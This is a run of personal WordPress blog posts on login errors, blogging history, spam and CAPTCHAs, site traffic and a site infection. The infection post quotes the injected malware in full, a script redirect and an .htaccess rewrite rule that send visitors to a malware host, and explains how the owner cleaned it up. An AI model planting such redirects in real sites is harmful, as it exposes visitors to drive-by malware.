WordPress Always check the Log Files

Recently I built a new PC and I ran into an issue where for some reason I couldn’t login to WordPress on my blog from the new PC. I could still login on my laptop, but not on my PC.

Every time I tried to login I got hit with the following error:

ERROR: Cookies are blocked or not supported by your browser. You must enable cookies to use WordPress.

This appears to be quite a common error but none of the solutions I found for it seemed to work.

My browser was accepting cookies, they were definitely not disabled, I’d noticed that WordPress had recently auto updated to 3.8.1 so I assumed that was the problem and it would hopefully fix it’s self in the next update. Anyway it was working on my laptop so I could still login.

Then all of a sudden a couple of days ago my laptop stopped being able to login to WordPress with the same error…

I searched and searched for a solution, I edited themes, manually removed plugins, deleted themes, created my own plugins to explicitly set the cookie, tried to ensure the that domain was correct.

NOTHING WAS WORKING!

I’d seen some people say that a reinstall helped so I reinstalled WordPress, after taking a backup, and then copied back my wp-config.php because it had the login details for the database in it.

NOPE

Hunting for a solution for a couple of hours I decided to check the error log…

I wish I’d done this earlier… The log was full of errors most of them had something along the lines of:

PHP Warning:  Cannot modify header information – headers already sent by (output started at /home/sites/31b/e/e93e37b995/public_html/wp-config.php:34)

Ok Lets look at wp-config.php… Lo and behold:

image

What’s that after the end tag of PHP script? Two new lines…

It turns out that the second you write anything to the actual page, the header gets written, which means that you can’t set cookies. That includes whitespace.

Those two blank lines broke my WordPress site so bad that I couldn’t login.

So yeah, I’ve learnt a lesson I should already know:

ALWAYS LOOK AT THE LOG FILES!

1,001 Arabian Blogs

This is my 1,001st blog post, I thought I’d do a quick retrospective. I’m not sure why I started blogging, I remember back in 1998 a friend told me that they had set up a blog for themselves and I thought to myself “what the hell was the point in that”, they were posting a diary online, probably on live journal or something like that.

A few years later I bought ohmz.co.uk among others (I’ve also been the proud owner of watermelons.co.uk…), but I never used that because I didn’t know what the hell I wanted to do, so that domain expired. At some point I bought ohmz.net, and I installed php-blog, a really simple bit of software that allowed me to post crap to my webspace. Back then I was working as a stage technician and I had dreams of being a music blogger. I blogged about my experience backstage with whatever bands I was working with, usually at King Tuts Wah Wah Hut, it was really poorly written and really boring I think 3 people read it in total. I stopped blogging there after a while and forgot about it, until I got an email from my web host saying that my blog had been closed down because it had been identified as a spam center. Apparently there was a flaw in the blogging software I used that allowed people, or bots, to email people from my blog and they were spamming the bejesus out of the internet.

I un-installed the blog software I was using and installed Drupal, played around with it for a while, didn’t like it and settled on WordPress.

My blog lay dormant for some time, I’d post the odd bit of crap every now and then, but I wasn’t really that interested. I had a minor spike when I posted a picture of my birthday cake a few years ago:

But then my blog went dormant again for almost a year…

Recently I started using my blog as place to post random cool stuff I found on the internet, art, gadgets whatever, I wasn’t expecting anyone to read it, it was just so I could remember that the stuff existed. One particular post involved an image of someone with make-up that made them look like a drawing by Roy Lichtenstien:

It didn’t get much attention at the time but a year later I saw a huge spike in my visits:


I had a whopping 40 views in one day to that post, so I wrote a follow up post with some more examples, those two posts remain some of my most popular posts… I was getting up to 100 views a day due to having posted some pop art make-up, and I was happy…

Then something strange happened… I’m not entirely sure what the catalyst was but in the past two months my views have sky rocketed:

I went from a little over 300 views in Oct 2010 to over 33,000 in February of 2012, and there is still time left today for me to get more. I appreciate that the spike in October was due to people looking for ideas for Halloween costumes, I’d expected a spike there, but then the hits continued to ramp up, I got a big boost by posting some geeky Valentines day cards but people are actually looking at the home page rather than just hitting individual blog posts. I think I may be experiencing my 5 minutes of fame…

I actually find it reall amusing that having published my 1,000th blog post yesterday and my views yesterday were 1,337, a number which I think is dear to geeks around the world:

So what have I been blogging about aside from posting random links to stuff I’ve found online? My amatuer photography, my rubbish writing and various story ideas including my NaNoWriMo efforts (Check “writing” link at the top of this page if you want to have a look), Some tribal art I put together a while ago:

A tribal dragonfly

I’ve taken a stab at writing my own web comic creatively titled Blip and Blop:

I’ve also written various film reviews and rants. I think in the future I’m going to try and post more original content to balance out the stuff I’ve posted that just links to other peoples work. I’m not going to stop posting links to other stuff I’ve found, just supplement it with origianal content that you can only find here, that is until someone else reblogs it elsewhere (I’m under no illusion that will ever happen…).

Anyway I just wanted to say thanks for reading my blog, I hope you continue to enjoy it.

Omar

P.S. In case you were wondering about the title, I am aware that none of my blog posts have been in Arabic but I am an Arab (or at least half Arab) and I felt the title worked so I went with it.

P.P.S. If there is anything that I’ve blogged about in the past that you have found particularly interesting or you just want to comment on the style of the blog/give constructive advice or abuse feel free to mention it in the comments. I may get a lot of views but not many people comment on my blog, and it’s cold and lonely in cyberspace…

 

Spam what spam? CAPTHA cures all…

I’m quite impressed by how effective just adding a CAPTCHA to my site has been in preventing spam comments/user registrations. I know it’s to be expected but I’ve gone from getting 170 spam comments and about 30 spam registrations a day to just one spam comment and no registrations.

Currently I’m using the SI Captcha for WordPress, does anyone know of one that is better? I installed Solvemedia’s CAPTCHA plugin which makes people type in the words from adverts as a CAPTCHA and supposedly allows you to earn “MEGA BUCKS” in doing so. But it asked for my accountants details and I don’t have an accountant, Also I expect that it’s US ads only…

Here is a video about their CAPTCHA which I think at the heart of it is a good idea:

Solve Media from Solve Media on Vimeo.

I particularly like CAPTCHAs that make you think, like adding numbers, or asking general knowledge questions, although I was very disappointed in T3 who’s CAPTCHA is the question who makes the iPod, which doesn’t accept Foxconn as an answer, I’d expect more from a technology magazine…

It would be quite cool to have CAPTCHA that made you play a round of space invaders or Pacman or something like that and wouldn’t let you comment till you win… Hmmm… Cool maybe, annoying definitely.

Meh…

Awesomely Confusing Spam Comment

I use Akismet to block spammy comments from the blog, I don’t regularly get very much spam but today there were 22 new spam messages, among them was this gem:

I give birth to be familiar with a few of the articles on your website trendy, and I extremely like your style of blogging. I added it to my favorites entanglement stage roster and last will and testament be checking back soon. Divert check into public notice my orientation as highly and vindicate me conscious what you think. Thanks

It looks like it’s been passed through an auto translator and backwards about 20 times, but there is a certain poetry to it…

The link was to a Finnish site advertising “Instant Loans” (Thank you Google Translate). I have to say it’s brightened up my otherwise snowy day.

Webarh? More like Web Aargh!

Earlier this weekend I got a Facebook message from a friend saying that my website was redirecting to a malware site. Thankfully I was near a computer and had a look at it, every page view was redirecting to a site that installed malware on your computer. Thankfully most browsers recognise this fact and present you with a warning page.

I did some hunting and it turns out I had been infected with webarh redirect virus (Also reffered to as funnysignage as it uses the same mode of attack), this virus has added the following  line to any index.php files it found:

<script>

document.location.href=’http://webarh.com/07628e5249a8b3459e49860dc9045837′;

</script>

Note the numbers at the end are just a random identifier, probably so that they can tell where it originated.

And it had also gone through pretty much every directory either replacing or adding a .htaccess file with the following content:

RewriteEngine On
RewriteBase /
RewriteRule ^(.*)? http://webarh.com/07628e5249a8b3459e49860dc9045837

For the non tech savvy the first bit tells your web browser to redirect to (Don’t go to that link, bad things will happen):

“http://webarh.com/07628e5249a8b3459e49860dc9045837”

The other tells my web server to send all requests for ANY PAGES to that same URL. It’s a two pronged attack, if you have script blocking software on your browser the .htaccess file makes the server send you to the malware site, if your server ignores the .htaccess file, then there is a chance that the script will be work. Eitherway when you end up at that URL no doubt the website tries to exploit whatever vulnerabilities exist in your browser to install bad software on your computer.

I diligently deleted all the .htaccess files and removed the script line from every file I could find it in. I did a grep for webarh.com over the entire website, and removed any references to it I could find, I even changed the ftp password on my site because I read that sometimes that’s how webarh infects your server. It looked like all was good for about 18 hours my site was back up and running and everything was hunky dory. At about midnight last night I got a text from someone else telling me  my site was broken again. I check and sure enough it was redirecting again, but only partially, some of the other domains I host in subdirectories of my web space were okay.

I’d heard that the webarh/funnysignage redirect sometimes puts back doors into your site, I didn’t have the time to look through every php file on my server which hosts 4 wordpress installs and a phpbb install so I took a deep breath and deleted everything… Most of my content was in the database, the only content that wordpress stores on disk is images and stuff you have uploaded. Of course I took a backup of the site beforehand just in case.

I’ve so far restored two of my wordpress blogs, and everything seems okay, I deleted an old version of phpMyAdmin I had lying about from before my service provider gave me direct access to the database. I’ve not deleted the phpBB install yet as that didn’t seem to be infected aside from the fact that the .htaccess file was causing everything to redirect to the malware site. So the next step would be to remove that too.

Fingers crossed it’s all looking good, if it happens again then I’m going to be a little more worried, either:

  • There is a backdoor in the SQL somewhere, then I’m really screwed.
  • There is a backdoor in phpBB, in which case I’ll have to reinstall that.
  • There is a virus on my computer which is picking up the the FTP password and using it to wreak havoc on my website…

I’m hoping that None of the above apply… And that I’ll be safe from here on out, I think that the root cause of this was the fact that one of my sites didn’t have the latest version of WordPress installed on it, my reasoning behind this is that WordPress recently released a security update that allowed code to be executed etc… I’d updated my main site but had forgotten to update the others.

I’d appreciate anyone who notices any issues on my website getting in touch with me to tell me so.

Hello?

Recently I’ve seen an upsurge in the number of people who visit my site on a daily basis. I’m averaging about 50 or so people a week apparently. That’s not people who visit individual pages because it’s a hit on Google or Stumble Upon that is people who just visit the home page of www.ohmz.net.

I was just wondering who you are? Are you people or are you Russian spam bots scraping my page for content which you can use to thinly veil the fact that your site is actually selling herbal Viagra?

Leave a comment if you are a real person, and heck if you really want to tell me why you come here, and who you are.

You can tell Halloween is coming up because…

I had a quick look at the stats for my blog just there and I noticed that one post was getting a shed load more hits than any of the others:

I don’t get very many hits, so 40 in one day for an old post titled Cool Lichtenstein Pop Art make up is pretty impressive for me and all because I posted this image I randomly found online:

It’s a cool photo, and I predict that this year there will be many copy-cat photo’s taken for Halloween…

On the off chance that anyone gets to this blog post and wants inspiration I found an article with in progress photo’s of someone doing something similar on a blog called illusion360. It was apparently for a Halloween photo-shoot for MAC Makeup.

I think it’s really cool but I’m not sure I think it’s as good as the one in the original article.

You also might find this image of a girl with pixelated makeup pretty cool.

The article its from is in French (I assume, I didn’t actually read it, but it’s not English) but you don’t need to be able to read to rip it off this Halloween.

That is all really, I don’t have much more to say, if everyone who viewed that original blog post clicked on an ad I’d probably make at least a 50p! that would be awesome… Unlikely but awesome none the less…
Here are a couple of examples of someone who has tried the Lichtenstein look from flickr:
Cheater!


Poison

Incidentally after just a little bit of digging I managed to find out that the original picture was by an artist/photographer? called Eva Mueller here is another awesome example of her work:
Hommage to Roy Lichtenstein

In case you hadn’t guessed I’m having trouble sleeping…

Meta: Test post

It appears twitter feed has started allowing me to use URL shortening services other than tiny.url. unfortunately I can’t seem to find my old login so I’ve setup a new one. Just checking it doesn’t post twice…